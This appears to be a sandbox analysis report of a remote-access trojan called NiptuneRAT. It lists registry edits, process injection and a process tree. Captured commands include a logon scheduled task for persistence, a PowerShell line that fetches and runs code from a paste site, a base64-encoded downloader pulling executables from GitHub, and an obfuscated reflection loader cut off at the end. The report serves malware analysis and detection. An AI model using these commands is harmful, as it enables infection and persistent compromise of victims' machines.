Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\NodeSlot = "5" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\MRUListEx = 00000000ffffffff C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\$77.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\dllhost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3600 wrote to memory of 4896 N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe
PID 3600 wrote to memory of 4896 N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe
PID 3600 wrote to memory of 1560 N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe
PID 3600 wrote to memory of 1560 N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe
PID 2396 wrote to memory of 2556 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\System32\cmd.exe
PID 2396 wrote to memory of 2556 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\System32\cmd.exe
PID 2396 wrote to memory of 1616 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\system32\cmd.exe
PID 2396 wrote to memory of 1616 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\system32\cmd.exe
PID 2396 wrote to memory of 3464 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\system32\cmd.exe
PID 2396 wrote to memory of 3464 N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe C:\Windows\system32\cmd.exe
PID 2556 wrote to memory of 1256 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 2556 wrote to memory of 1256 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3464 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3464 wrote to memory of 3304 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1616 wrote to memory of 4072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 1616 wrote to memory of 4072 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\timeout.exe
PID 3304 wrote to memory of 2320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3304 wrote to memory of 2320 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2320 wrote to memory of 4656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE
PID 2320 wrote to memory of 4656 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE
PID 1616 wrote to memory of 3988 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\$77.exe
PID 1616 wrote to memory of 3988 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Roaming\$77.exe
PID 4656 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe
PID 4656 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe
PID 4656 wrote to memory of 4776 N/A C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe
PID 4656 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE
PID 4656 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 4936 wrote to memory of 3728 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3728 wrote to memory of 620 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 3728 wrote to memory of 676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 3728 wrote to memory of 952 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 388 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 3728 wrote to memory of 908 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 676 wrote to memory of 2772 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 3728 wrote to memory of 1088 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 3728 wrote to memory of 1096 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 3728 wrote to memory of 1176 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 676 wrote to memory of 2772 N/A C:\Windows\system32\lsass.exe C:\Windows\sysmon.exe
PID 1044 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE C:\Windows\System32\schtasks.exe
PID 1044 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE C:\Windows\System32\schtasks.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\NiptuneRAT-main\" -spe -an -ai#7zMap21379:88:7zEvent29350

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

"C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe

"C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe"

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe

"C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe"

C:\Users\Admin\Desktop\$77NiptuneClient.exe

"C:\Users\Admin\Desktop\$77NiptuneClient.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77" /tr '"C:\Users\Admin\AppData\Roaming\$77.exe"' & exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpD3B1.tmp.bat""

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c powershell "irm rentry.co/System-Settings/raw | iex"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "$77" /tr '"C:\Users\Admin\AppData\Roaming\$77.exe"'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell "irm rentry.co/System-Settings/raw | iex"

C:\Windows\system32\timeout.exe

timeout 3

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiADUAWQBQAEQAdgBQAGkAUwBvAFYAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAHoANwA3AGYALwAzADYAMgA5ADcAMwAvAHIAYQB3AC8AbQBhAGkAbgAvACQANwA3AEEAUABDAE8ATgBTAFYAQwAuAEUAWABFACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwAkADcANwBBAFAAQwBPAE4AUwBWAEMALgBFAFgARQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AegA3ADcAZgAvADMANgAyADkANwAzAC8AcgBhAHcALwBtAGEAaQBuAC8AJAA3ADcAQQBQAEMATwBOAFMAVgBDAC4ARQBYAEUAJwA7ACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAD0AIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAnACQANwA3AEEAUABDAE8ATgBTAFYAQwAuAEUAWABFACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=

C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE

"C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE"

C:\Users\Admin\AppData\Roaming\$77.exe

"C:\Users\Admin\AppData\Roaming\$77.exe"

C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe

"C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe"

C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE

"C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:FmDvVBkCFmNM{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$HTNynACjESgbSk,[Parameter(Position=1)][Type]$VUapLZDwuA)$svPFHJRydKw=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+'l'+'e'+[Char](99)+'te'+'d'+''+[Char](68)+'e'+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+''+'y'+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+'u'+''+'l'+''+'e'+'',$False).DefineType(''+[Char](77)+'y'+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'Typ'+[Char](101)+'','C'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+''+','+''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+'c'+[Char](44)+'Se'+[Char](97)+'l'+[Char](101)+'d'+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+'as'+'s'+''+[Char](44)+''+'A'+''+[Char](117)+'toC'+[Char](108)+''+'a'+'ss',[MulticastDelegate]);$svPFHJRydKw.DefineConstructor(''+'R'+''+[Char](84)+''+[Char](83)+'pe'+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Stand